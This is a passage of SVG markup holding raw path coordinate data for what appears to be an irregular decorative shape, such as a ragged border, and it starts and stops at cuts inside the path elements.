.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path 